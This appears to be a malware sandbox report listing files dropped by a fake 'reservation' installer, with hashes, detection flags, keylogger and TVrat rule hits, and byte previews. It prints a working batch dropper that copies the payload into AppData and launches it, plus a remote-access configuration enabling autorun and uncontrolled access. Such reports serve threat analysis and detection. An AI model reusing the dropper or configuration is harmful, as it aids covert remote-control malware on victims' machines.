                                                                                                                          SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                          MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                          SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                          SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                          SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\aw_sas32.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):17648
                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\config.ini (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):586
                                                                                                                          Entropy (8bit):5.193353768565217
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:LzSeQNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:HSeWlcMypJD5KxkiaJosBq
                                                                                                                          MD5:CAA0C19D802D86B5A6B290897AA864EE
                                                                                                                          SHA1:01C139425983B9EC2A8FE42C9D685D1193D5A8BB
                                                                                                                          SHA-256:EDEECC1090C314D7397B171CD09E1C208FCCE3B580794BAC425475E4292629FA
                                                                                                                          SHA-512:95B595038F720A45449E77E121B0AF3FFA251034EFD6F187C8572C54F667D11F467AF6A5F062F50B60C8001645CA33B5F204482753AF72BDD2AA3A3834BD2C35
                                                                                                                          Malicious:false
                                                                                                                          Preview:[config]..Security.FixPass=96E79218965EB72C92A549DD5A330112..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\fguwrtug.bmp (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10752
                                                                                                                          Entropy (8bit):7.9500738973365355
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Nr2Ya94sQ6EqghLbOU+fWt1t7ZPA+KAMcB6Bk0Nmd32iF2la8XncszJfBzG1:p2Ya94s8q8+fQttI+8cABGJ4la8vVfp6
                                                                                                                          MD5:15955D8B74435C9CA1A6E273644CE86B
                                                                                                                          SHA1:E43F73B27A7F76014706296339F4CE1C71C86EFE
                                                                                                                          SHA-256:796097E407FE8EB02A965CD5416DDAE0C1F178C153A71FCF8590F4BED4F5A389
                                                                                                                          SHA-512:38593F7523D416A4E0BC855F52BA76B1ABE1F65E912ED5E892DE4C210B0055B07472DA5B8C0CB731BC1E4B26C43FF2A346CE84B893907AB121EB74D6555296C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:......JFIF.................................................. ,$..) ..&6&).2333."9>;1=,230...........2)$)52222222222822222222222222222222222222222222222222...........".......................................F......................!.1..AQ."aq.2.Bb...#R....3r....C....$s.45DSt.................................(........................!1A"Q.a2q.................?..N....+..@S.W...@....+..../..8..5.=..}.kAD....>q....E..n.r./.Q..v......5..v.l....f?.s.....m.R.Z.......D..u...-....K..U...S.Xt ......^'... ...[gv....Xjm.*p$.~..n.LY.%.,@..x....|(...Z.X.Uk.1..=...u....U.1.L...@..-r......e...G.Vo.......Vb..P.y.A.....&v5..p..U#Sy.........X..+&-........../.k.A..0$..Jt..t.&.V.\u.q.+....."J..GH..o[.......Tjq"G..o..e.:H.h...:..Ah..=.H..J...V....Y...2.........{.;U.......`...Y..@..'`3....(.s.k..c...eY...03.'.T.V..e@..h \(..vI]...F....Fu.....'...g-.....-..;6L.i.N...W.-.f...WQ..@..ub;.=.[.r..|k......bL...i.o&..9..m..`....3...a...R.7%.=z..N.s.n.R..b;k......h.5M...h..Ay..........q

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):395
                                                                                                                          Entropy (8bit):4.596567576097278
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:hmR9ooW9rw49edspB7utcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvWVOzwaowQ4:w7Q249edaBS7jfxmfJ8WsQwH
                                                                                                                          MD5:21138C5F0FC42E27B57CBADC4CFCB7B7
                                                                                                                          SHA1:EBC7FB05FD67B43925EC4EE2A43A2F3152712B28
                                                                                                                          SHA-256:C8D896D8DAE872D0FF7ED407E9706E19F798FBADBA7AF7EF48E5EDDA4BF05C23
                                                                                                                          SHA-512:20D832E675D2AAB97DF7FC10BAD055F96327F782224C0A1C0F10C4D7CF01CCC7428AB934DA889935C2E67D6FAC959C1F52D796314988168844C5F079B55D67F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:@echo off..set "StartDirName=fat" ..set "TempDirName=qilq" ..set "BatchName=g3ll5lm.bat" ..set "ProcName=ast.exe" ......mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\hatls.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2236144
                                                                                                                          Entropy (8bit):5.624149670958732
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                          MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                          SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                          SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                          SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-26KIS.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1388688
                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7543992
                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-8MMT6.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):581304
                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-9LOO0.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10752
                                                                                                                          Entropy (8bit):7.9500738973365355
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Nr2Ya94sQ6EqghLbOU+fWt1t7ZPA+KAMcB6Bk0Nmd32iF2la8XncszJfBzG1:p2Ya94s8q8+fQttI+8cABGJ4la8vVfp6
                                                                                                                          MD5:15955D8B74435C9CA1A6E273644CE86B
                                                                                                                          SHA1:E43F73B27A7F76014706296339F4CE1C71C86EFE
                                                                                                                          SHA-256:796097E407FE8EB02A965CD5416DDAE0C1F178C153A71FCF8590F4BED4F5A389
                                                                                                                          SHA-512:38593F7523D416A4E0BC855F52BA76B1ABE1F65E912ED5E892DE4C210B0055B07472DA5B8C0CB731BC1E4B26C43FF2A346CE84B893907AB121EB74D6555296C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:......JFIF.................................................. ,$..) ..&6&).2333."9>;1=,230...........2)$)52222222222822222222222222222222222222222222222222...........".......................................F......................!.1..AQ."aq.2.Bb...#R....3r....C....$s.45DSt.................................(........................!1A"Q.a2q.................?..N....+..@S.W...@....+..../..8..5.=..}.kAD....>q....E..n.r./.Q..v......5..v.l....f?.s.....m.R.Z.......D..u...-....K..U...S.Xt ......^'... ...[gv....Xjm.*p$.~..n.LY.%.,@..x....|(...Z.X.Uk.1..=...u....U.1.L...@..-r......e...G.Vo.......Vb..P.y.A.....&v5..p..U#Sy.........X..+&-........../.k.A..0$..Jt..t.&.V.\u.q.+....."J..GH..o[.......Tjq"G..o..e.:H.h...:..Ah..=.H..J...V....Y...2.........{.;U.......`...Y..@..'`3....(.s.k..c...eY...03.'.T.V..e@..h \(..vI]...F....Fu.....'...g-.....-..;6L.i.N...W.-.f...WQ..@..ub;.=.[.r..|k......bL...i.o&..9..m..`....3...a...R.7%.=z..N.s.n.R..b;k......h.5M...h..Ay..........q

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-9MCCS.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):17648
                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-BFIN6.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2098416
                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x...x...x..,x...x...x...x...x...x(.8x...x...xT..x...x...x@s.x...x@s/x...x..(x...x@s-x...xRich...x................PE..L....<.Y...........!.....j...................................................` ....... ...@.............................1...c..x.................................. ...8............................w..@............`...............................text....i.......j.................. ..`.rdata..XA.......B...n..............@..@.data............Z..................@....idata..M....`......................@..@.rsrc...............................@..@.reloc..z............&..............@..B................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-BI7PN.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2236144
                                                                                                                          Entropy (8bit):5.624149670958732
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                          MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                          SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                          SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                          SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-GB3EG.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):586
                                                                                                                          Entropy (8bit):5.193353768565217
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:LzSeQNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:HSeWlcMypJD5KxkiaJosBq
                                                                                                                          MD5:CAA0C19D802D86B5A6B290897AA864EE
                                                                                                                          SHA1:01C139425983B9EC2A8FE42C9D685D1193D5A8BB
                                                                                                                          SHA-256:EDEECC1090C314D7397B171CD09E1C208FCCE3B580794BAC425475E4292629FA
                                                                                                                          SHA-512:95B595038F720A45449E77E121B0AF3FFA251034EFD6F187C8572C54F667D11F467AF6A5F062F50B60C8001645CA33B5F204482753AF72BDD2AA3A3834BD2C35
                                                                                                                          Malicious:false
                                                                                                                          Preview:[config]..Security.FixPass=96E79218965EB72C92A549DD5A330112..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-HE32K.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):713456
                                                                                                                          Entropy (8bit):6.620067101616198
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..k...k...k....%B.b....%@....%A.r...P..z...P..}...P..d...Fx.h...k...=...k...J......Y......j.....L.j...k.$.j......j...Richk...........PE..L...Q.xX...........!.........$.......P....................................... ............@.........................0....... ...(.......@........................8..0p..p............................p..@...............\............................text...9........................... ..`.rdata..............................@..@.data...(...........................@....gfids..d...........................@..@.rsrc...@...........................@..@.reloc...8.......:..................@..B................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-K402A.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):172216
                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-LREC4.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):43
                                                                                                                          Entropy (8bit):5.286729870981167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:SYMGa4VOUbLDFwozJO+n:SBU/Bwoz7n
                                                                                                                          MD5:33118193A9FD63FBCF60AE73FC60199E
                                                                                                                          SHA1:8DAFC111E44FABAE3EAD8325BB03E97871393D99
                                                                                                                          SHA-256:1E0DB7EB8AA0E8D9203FBB39753E82D6077A867ADF93D438CE24333686793159
